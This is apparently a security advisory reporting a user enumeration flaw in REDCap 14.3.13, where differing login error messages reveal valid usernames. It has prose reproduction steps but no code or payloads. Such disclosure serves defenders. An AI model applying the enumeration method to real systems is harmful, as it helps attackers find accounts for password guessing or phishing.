REDCap User Enumeration Vulnerability

A user enumeration vulnerability exists in REDCap version 14.3.13. The issue arises because the application provides different error messages based on whether a username is valid or not. This discrepancy allows attackers to infer the existence of usernames by sending multiple HTTP authentication requests, effectively enabling brute-force attacks. Although there is a mechanism intended to protect against this type of attack, it inadvertently allows for user enumeration.

Impact

Exploitation of this vulnerability could lead to unauthorized knowledge of valid usernames, potentially facilitating further attacks such as password guessing or phishing.

Reproduction

To reproduce this vulnerability, send HTTP authentication requests to the REDCap application. Observe the response messages: valid usernames will generate a different error message compared to invalid ones. This difference can be used to systematically identify existing usernames.